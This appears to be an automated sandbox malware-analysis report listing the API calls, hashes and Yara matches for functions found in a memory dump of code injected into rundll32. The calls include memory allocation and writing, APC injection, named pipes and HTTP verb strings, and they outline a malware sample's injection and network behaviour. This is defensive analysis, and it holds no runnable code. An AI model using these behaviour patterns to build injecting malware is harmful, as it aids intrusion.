                              • API String ID: 499515686-0
                              • Opcode ID: c4d7c25af9d54add9a05c2230255f80e50b491958420680131ecc875a7d01588
                              • Instruction ID: a3379f06319049751ddd30838f23c42a475e7b86818f1d0dbd98aa2ac9ae707f
                              • Opcode Fuzzy Hash: c4d7c25af9d54add9a05c2230255f80e50b491958420680131ecc875a7d01588
                              • Instruction Fuzzy Hash: 5A41477090420AEFDF01EFA4CC8ABAEBFB9FF40304F114565E502A6190DBB49E50DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594EAE7
                                • Part of subcall function 05947950: NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
                                • Part of subcall function 05947950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05947988
                                • Part of subcall function 05947950: SetLastError.KERNEL32(00000000), ref: 0594798F
                              • GetLastError.KERNEL32(?,00000318,00000008), ref: 0594EBF7
                                • Part of subcall function 059336BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 059336D3
                              • memcpy.NTDLL(00000218,059538A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0594EB76
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0594EBD0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                              • String ID:
                              • API String ID: 2966525677-3916222277
                              • Opcode ID: 3f6695c8d88f4bd077283134e766456daf4072cc2c69786550cc710f9df6b307
                              • Instruction ID: a854fabff5aef96d390e84aa2b0a24b0d503c8a8e9baa21ae73d1e521d6e8eb5
                              • Opcode Fuzzy Hash: 3f6695c8d88f4bd077283134e766456daf4072cc2c69786550cc710f9df6b307
                              • Instruction Fuzzy Hash: 35316F71A01309EFDB20DF65D989EAAB7BDFB04254F10496AE50AD7240EB30AE588F51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset$memcpy
                              • String ID:
                              • API String ID: 368790112-0
                              • Opcode ID: 6080b7e7d1cf312dc789f62cc6136f002ce1fbda152b01f3f05f92e0fb49b093
                              • Instruction ID: 1a0f40b36e507aa8cf32ed143c852956ab4883586e40f3a1783b57c885d2e012
                              • Opcode Fuzzy Hash: 6080b7e7d1cf312dc789f62cc6136f002ce1fbda152b01f3f05f92e0fb49b093
                              • Instruction Fuzzy Hash: CBF1E034604B9ADFDB31CF68C598AAABBF4FF52300F24496DC5E796681D231AA45CF10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0593D7D0
                              • lstrlenW.KERNEL32(?), ref: 0593D7DE
                              • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0593D809
                              • lstrcpyW.KERNEL32(00000006,00000000), ref: 0593D837
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Query$lstrcpylstrlen
                              • String ID:
                              • API String ID: 3961825720-0
                              • Opcode ID: 98fafd8e2d6b69ed8899f43257cf322c11368c77051287423d465cc7227e956d
                              • Instruction ID: 5f1c2a7b01c0d9401433c3af29a780958d7e93c8fd355974f99f6299bfc346a8
                              • Opcode Fuzzy Hash: 98fafd8e2d6b69ed8899f43257cf322c11368c77051287423d465cc7227e956d
                              • Instruction Fuzzy Hash: E9412771604309EFDB11CFA8C986AAEBBBCFF44354F004069F906A7250DB74EA21DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0595A1E8,00000001), ref: 05948215
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948260
                                • Part of subcall function 059473AA: CreateThread.KERNEL32(00000000,00000000,00000000,0594893A,0595A174,05950998), ref: 059473C1
                                • Part of subcall function 059473AA: QueueUserAPC.KERNEL32(0594893A,00000000,?,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473D6
                                • Part of subcall function 059473AA: GetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473E1
                                • Part of subcall function 059473AA: TerminateThread.KERNEL32(00000000,00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473EB
                                • Part of subcall function 059473AA: CloseHandle.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473F2
                                • Part of subcall function 059473AA: SetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473FB
                              • GetLastError.KERNEL32(05941FE9,00000000,00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948248
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948258
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                              • String ID:
                              • API String ID: 1700061692-0
                              • Opcode ID: b239e9b710a9e907c96aba53c068fdcebd6161d9b952ad61c5b7ded90c811e31
                              • Instruction ID: 253fb4271c6f90b1949b5d655debba2030269381e989a698814e488912fc1a6c
                              • Opcode Fuzzy Hash: b239e9b710a9e907c96aba53c068fdcebd6161d9b952ad61c5b7ded90c811e31
                              • Instruction Fuzzy Hash: 9BF0A4B1309301AFE3115BB89C49E277F6CEB85371B150735F916D2280DB704C259BB4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetVersion.KERNEL32(0595A3E0,05933337,?,?,?,?,?,?,?,05939100,?), ref: 05931F79
                              • GetModuleHandleA.KERNEL32(?,05F3979A,?,?,?,?,?,?,?,05939100,?), ref: 05931F96
                              • GetProcAddress.KERNEL32(00000000), ref: 05931F9D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProcVersion
                              • String ID:
                              • API String ID: 3310240892-0
                              • Opcode ID: c6162fdd706a10a8d8e97fb2208d3232c430b7f45e3f3b202509fb0733708d12
                              • Instruction ID: 271da4366838c7bf88e9701b9afa348beba42a6e8f269a5c910d2a8ea184854a
                              • Opcode Fuzzy Hash: c6162fdd706a10a8d8e97fb2208d3232c430b7f45e3f3b202509fb0733708d12
                              • Instruction Fuzzy Hash: FC1139B4218302DFDB508FA5C94EB11BFE9FB99305B46C1A9E00ACB261EB71D455CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0593B7E9
                              • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0593B829
                                • Part of subcall function 05945312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0594907F,?,00000004,00000000,00000004,?), ref: 05945330
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0593B832
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                              • String ID:
                              • API String ID: 4036914670-0
                              • Opcode ID: 7a8b217f8a5cadcbb0ccda69634a089e942c2cff27318b29176a0203c1a39b39
                              • Instruction ID: 97f1c024fd1683bfbee02c85ae282fd0f57301f799e24b37bc634b11ff747e91
                              • Opcode Fuzzy Hash: 7a8b217f8a5cadcbb0ccda69634a089e942c2cff27318b29176a0203c1a39b39
                              • Instruction Fuzzy Hash: DD01FB75A00208FFEB10AAA5EC0ADEEBBBEEB84700F500425F945E2050EB75D914DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0594385A
                              • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05943891
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFreeHeapInformationQueryStatusSystem
                              • String ID:
                              • API String ID: 2533303245-0
                              • Opcode ID: 7b5c3746b857cd9d30afeb1bd48dc2e856189f9fa29f2e9770a108abef292152
                              • Instruction ID: 315eda36983cd3758075eb999a513b745331bb2d4978ec50f45dc18c6977f26a
                              • Opcode Fuzzy Hash: 7b5c3746b857cd9d30afeb1bd48dc2e856189f9fa29f2e9770a108abef292152
                              • Instruction Fuzzy Hash: 2601A772906224BBD7259A748C08EAEFA6DEF81B50F120924FD0163300E7789E808AD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 059364E3
                              • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 059364FB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuerymemset
                              • String ID:
                              • API String ID: 2040988606-0
                              • Opcode ID: 179864be10d57348fd76093832b671894363cf743b1d40d7c8829b971d44ec95
                              • Instruction ID: 63fe2adb03d99ffb0d7f5886ca8745d6b7f2032fd7919740919ee4b9c693e5a0
                              • Opcode Fuzzy Hash: 179864be10d57348fd76093832b671894363cf743b1d40d7c8829b971d44ec95
                              • Instruction Fuzzy Hash: 10F0FF76A04228BBEB10DA91DC49FDEBFACEB04740F404061FA08E6191E770EA55CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0594524D
                              • SetLastError.KERNEL32(00000000,?,0593C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 05945254
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$LastStatus
                              • String ID:
                              • API String ID: 4076355890-0
                              • Opcode ID: bbb6c63b7c9869810444908dfafafba64171ee4c9d4d2daa786e4b145cd45c85
                              • Instruction ID: 8e8e6c215f4a92ebe0383011ad2be639a1601bb86a7833c8f979251d3c644063
                              • Opcode Fuzzy Hash: bbb6c63b7c9869810444908dfafafba64171ee4c9d4d2daa786e4b145cd45c85
                              • Instruction Fuzzy Hash: A2E01A3220421AABDF125EE89C05E9EBF69EB0D781B028011FE15D2121CB31DC319FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 05950327
                              • memset.NTDLL ref: 05950336
                                • Part of subcall function 05938E0C: memset.NTDLL ref: 05938E1D
                                • Part of subcall function 05938E0C: memset.NTDLL ref: 05938E29
                                • Part of subcall function 05938E0C: memset.NTDLL ref: 05938E54
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                              • Instruction ID: 21be16b273a2ff3c10cd05f0b8bc7c104ea93e8cf0cf38202e851b6a7400c294
                              • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                              • Instruction Fuzzy Hash: 0F021070501B629FC775CF29C698967B7F1BF44720B604E2EDAE786A90E631F891CB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                              • Instruction ID: 5181e827ccdf453938f17983b46bc85122dc10d24bc7f381b6e2a68e7ef3cbce
                              • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                              • Instruction Fuzzy Hash: 7822857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: 50b56c6f7b168128e208852fe3ddd7d4b6c66d7cd50193ba0e3824c2a843ac7a
                              • Instruction ID: 0a842c34911b78b594d7528c385eedfd17245021dee5621862512613d9725027
                              • Opcode Fuzzy Hash: 50b56c6f7b168128e208852fe3ddd7d4b6c66d7cd50193ba0e3824c2a843ac7a
                              • Instruction Fuzzy Hash: A0429A30A08B45DFCB25CF69C481ABABBF6FF49304F54896EC49B9B651D734A486CB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05948EC7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateProcessUser
                              • String ID:
                              • API String ID: 2217836671-0
                              • Opcode ID: 2d8fef027ccee4eae6c799f3098ad69cfc0d399f78cfc442aa6f68f7ed2fc7f7
                              • Instruction ID: 515c35dd6f599a9d47525a3146f3cd821bcdc842ddc4118725379e4767644416
                              • Opcode Fuzzy Hash: 2d8fef027ccee4eae6c799f3098ad69cfc0d399f78cfc442aa6f68f7ed2fc7f7
                              • Instruction Fuzzy Hash: A811AF32214249BFDF029E98DD01DEA7FAAFF08265B099215FE1952120C732DC71EF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 059336D3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorStatus
                              • String ID:
                              • API String ID: 1596131371-0
                              • Opcode ID: 725f578fe65a26d333c08c6042f844d32c2d9520f04d4483550569ad809dc7bb
                              • Instruction ID: 402b1fa5b6d330d13c3d65751e5a654b61316da4b266bf3e2f2f9839b579ad19
                              • Opcode Fuzzy Hash: 725f578fe65a26d333c08c6042f844d32c2d9520f04d4483550569ad809dc7bb
                              • Instruction Fuzzy Hash: 70C01236509302EFDF095B50D81A92ABE55BB50380F004818B54A80060CA319460C700
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                              • Instruction ID: 87123129e8aa6c97fd31639c5f7d0da74f17343c3b00844d7ca8181d40e46a5f
                              • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                              • Instruction Fuzzy Hash: A521B872904204ABDB11DF68CCC4967B7E9FF44360B05C969ED169B245D730F929C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05945C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05945C5C
                                • Part of subcall function 05945C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05945D1D
                                • Part of subcall function 05945C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05945D26
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 05933860
                                • Part of subcall function 0593A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0593A990
                                • Part of subcall function 0593A976: CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
                                • Part of subcall function 0593A976: GetLastError.KERNEL32(?,00000000,05948C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0593A9BE
                                • Part of subcall function 0593A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593A9FE
                                • Part of subcall function 0593A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA1D
                                • Part of subcall function 0593A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA33
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 059338C3
                              • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 0593393F
                              • StrTrimA.SHLWAPI(00000000,?), ref: 05933961
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 059339A1
                                • Part of subcall function 0593F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 0593F0B0
                                • Part of subcall function 0593F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,05933899,?), ref: 0593F0DE
                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 05933A47
                              • CloseHandle.KERNEL32(?), ref: 05933CD6
                                • Part of subcall function 0593E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,05933A69,?), ref: 0593E2F2
                                • Part of subcall function 0593E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05933A69,?), ref: 0593E320
                                • Part of subcall function 0593E2E6: ResetEvent.KERNEL32(?,?,?,?,?,05933A69,?), ref: 0593E33A
                              • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 05933A7C
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933A8B
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933AB8
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933AD2
                              • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 05933B1A
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 05933B34
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05933B4A
                              • ReleaseMutex.KERNEL32(?), ref: 05933B67
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933B78
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933B87
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933BBB
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933BD5
                              • SwitchToThread.KERNEL32 ref: 05933BD7
                              • ReleaseMutex.KERNEL32(?), ref: 05933BE1
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933C1F
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933C2A
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933C4D
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933C67
                              • SwitchToThread.KERNEL32 ref: 05933C69
                              • ReleaseMutex.KERNEL32(?), ref: 05933C73
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933C88
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933CEA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933CF6
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D02
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D0E
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D1A
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D26
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D32
                              • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05933D41
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                              • String ID:
                              • API String ID: 2369282788-0
                              • Opcode ID: aa2be75967bfc6cf7de62e4cd5cb9ed6716091694021f920bc081fe01f8eccfc
                              • Instruction ID: 8d65e68b8953aabac95dc954faea2e306b1d198e276a70dc5a9d3f232bf3f153
                              • Opcode Fuzzy Hash: aa2be75967bfc6cf7de62e4cd5cb9ed6716091694021f920bc081fe01f8eccfc
                              • Instruction Fuzzy Hash: 52E18971518305EFDB10AF68DD86D2AFBEDFB84264F054A29F995921A0EB30DC14CB22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL ref: 0594F1E5
                              • GetTickCount.KERNEL32 ref: 0594F1FF
                              • wsprintfA.USER32 ref: 0594F252
                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0594F25E
                              • QueryPerformanceCounter.KERNEL32(?), ref: 0594F269
                              • _aulldiv.NTDLL(?,?,?,?), ref: 0594F27F
                              • wsprintfA.USER32 ref: 0594F295
                              • wsprintfA.USER32 ref: 0594F2AF
                              • wsprintfA.USER32 ref: 0594F2D4
                              • HeapFree.KERNEL32(00000000,?), ref: 0594F2E7
                              • wsprintfA.USER32 ref: 0594F30B
                              • HeapFree.KERNEL32(00000000,?), ref: 0594F31E
                              • wsprintfA.USER32 ref: 0594F358
                              • wsprintfA.USER32 ref: 0594F37C
                              • lstrcat.KERNEL32(?,?), ref: 0594F3B4
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0594F3CE
                              • GetTickCount.KERNEL32 ref: 0594F3DE
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0594F3F2
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 0594F410
                              • StrTrimA.SHLWAPI(00000000,059553E8,00000000,05F3C310), ref: 0594F449
                              • lstrcpy.KERNEL32(00000000,?), ref: 0594F46B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0594F472
                              • lstrcat.KERNEL32(00000000,?), ref: 0594F479
                              • lstrcat.KERNEL32(00000000,?), ref: 0594F480
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0594F4FA
                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 0594F50C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,05F3C310), ref: 0594F51B
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594F52D
                              • HeapFree.KERNEL32(00000000,?), ref: 0594F53F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                              • String ID:
                              • API String ID: 4198993012-0
                              • Opcode ID: 645b75a6568ed524e6e460496c5f4eb51c53f77c4879e851a33c31a9186387a5
                              • Instruction ID: 9d95229e3121a6aaea8bb5e1f21bf8a3276fa12dea2fd2396ca26c7391ba4a54
                              • Opcode Fuzzy Hash: 645b75a6568ed524e6e460496c5f4eb51c53f77c4879e851a33c31a9186387a5
                              • Instruction Fuzzy Hash: 3FA15671518306AFCB01DFA8EC8AE5ABFA9FF48314F040525FA09C6221DB35D829DF95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?), ref: 05947B51
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05947BED
                              • lstrcpyn.KERNEL32(00000000,?,?), ref: 05947C02
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05947C1D
                              • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 05947D04
                              • StrChrA.SHLWAPI(00000001,00000020), ref: 05947D15
                              • lstrlen.KERNEL32(00000000), ref: 05947D29
                              • memmove.NTDLL(?,?,00000001), ref: 05947D39
                              • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 05947D65
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05947D8B
                              • memcpy.NTDLL(00000000,?,?), ref: 05947D9F
                              • memcpy.NTDLL(?,?,?), ref: 05947DBF
                              • HeapFree.KERNEL32(00000000,?), ref: 05947DFB
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05947EC1
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 05947F09
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                              • String ID: GET $GET $OPTI$OPTI$POST$PUT
                              • API String ID: 3227826163-647159250
                              • Opcode ID: 08c520c51039ddf25b84143fde91fd5c0345bea85bedeadd6119821c5536dbe9
                              • Instruction ID: d0a1222c802618c61ccc7d54d82850f1829e9e0a0e7a65e42bbbf3e0214ccb03
                              • Opcode Fuzzy Hash: 08c520c51039ddf25b84143fde91fd5c0345bea85bedeadd6119821c5536dbe9
                              • Instruction Fuzzy Hash: 88E14B31A04209EFDB15CFA8C889EAABBB9FF04301F148558F9169B251DB30ED52DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL ref: 0593E65B
                              • wsprintfA.USER32 ref: 0593E6C5
                              • wsprintfA.USER32 ref: 0593E70B
                              • wsprintfA.USER32 ref: 0593E72C
                              • lstrcat.KERNEL32(00000000,?), ref: 0593E763
                              • wsprintfA.USER32 ref: 0593E784
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593E79E
                              • wsprintfA.USER32 ref: 0593E7C5
                              • HeapFree.KERNEL32(00000000,?), ref: 0593E7DA
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0593E7F4
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0593E815
